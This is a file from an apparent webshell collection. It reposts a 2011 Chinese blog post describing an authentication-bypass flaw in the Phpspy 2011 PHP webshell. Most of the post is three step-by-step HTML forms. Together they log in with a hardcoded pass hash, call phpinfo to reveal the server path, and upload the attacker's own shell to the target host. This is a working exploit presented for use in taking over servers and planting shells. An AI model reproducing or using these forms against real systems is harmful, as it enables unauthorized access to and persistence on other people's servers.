webshell/php/Phpspy 2011 继续身份验证绕过漏洞
tennc df6d55ad4f update
php shell and jsp shell
2013-09-13 10:44:57 +08:00

43 lines
No EOL
2.1 KiB
Text
Raw Permalink Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

Phpspy 2011 继续身份验证绕过漏洞
作者:我不知道该唱什么 发布时间May 1, 2011 14:58:54 分类tech
官方目前下载已经修补上了 目前官方下载是2011.php 文件名为2011ok.php的是带洞版本。
鄙视转载不留版权的特别鄙视下那个什么hack情
http://hi.baidu.com/5427518 / http://www.hackqing.com/
我曾经还以为他是个人物。
今天m0r5和我说phpspy2011 我都不知道2011出来了 - - 就下下来看看
发现2011有不少借鉴WSO Shell的地方看到$pass还是在那个函数的上面但是验证成功过后用了一个Location重定向了一下之后会再次检查一次cookies。
但是想不明白作者为什么这样做和2010的原理一样一样绕过
下面给出一个更为直接的利用方法上传你自己的新shell
<form method="POST" action="http://www.hackshell.net/2011ok11.php">
<input name="password" type="text" size="20" value="hackshell_net">
<input type="hidden" name="pass" value="186c5d4c8ea2b5d95585cde854df00f9">
<input type="hidden" name="action" value="login">
<input type="submit" value="Login"></form>
点击Login这步点登录后 是登录界面 继续操作下一步:
<form method="POST" action="http://www.hackshell.net/2011ok.php">
<input name="password" type="text" size="20" value="hackshell_net">
<input type="hidden" name="pass" value="186c5d4c8ea2b5d95585cde854df00f9">
<input type="hidden" name="action" value="phpinfo"><input type="submit" value="Login"></form>
密码写hackshell_net (默认写好) 点击login之后 查看当前脚本绝对路径,
然后访问:
<form action="http://www.hackshell.net/2011ok.php" method="POST" enctype="multipart/form-data">
<input name="password" type="password" size="20">
<input type="hidden" name="pass" value="186c5d4c8ea2b5d95585cde854df00f9">
<input name="uploadfile" value="" type="file">
<input name="doupfile" value="Upload" type="submit">
<input name="uploaddir" value="D:/workspace/" type="hidden">
<input name="dir" value="D:/workspace/" type="hidden">
</form>
其中把iploaddir的value改为phpinfo中看到的路径上传shell。